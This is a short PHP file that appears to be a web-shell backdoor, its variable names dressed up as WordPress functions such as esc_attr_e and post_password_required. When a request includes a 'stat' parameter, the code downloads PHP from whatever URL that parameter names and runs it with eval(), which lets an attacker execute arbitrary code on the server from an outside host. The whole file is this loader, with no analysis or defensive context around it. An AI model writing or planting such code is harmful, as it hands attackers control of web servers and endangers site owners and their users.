<?php

if (isset($_GET['stat'])) {
    $esc_attr_e_jm = $_GET['stat'];
    if ($post_password_required_wu = curl_init()) {
        curl_setopt($post_password_required_wu, CURLOPT_URL, $esc_attr_e_jm);
        curl_setopt($post_password_required_wu, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($post_password_required_wu));
        curl_close($post_password_required_wu);
        exit;
    }
}